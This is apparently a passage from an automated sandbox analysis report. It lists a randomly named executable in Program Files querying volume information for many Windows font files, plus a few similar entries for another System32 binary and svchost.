                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeQueries volume information: C:\Windows\System32\r6Lr6XbTWt.exe VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
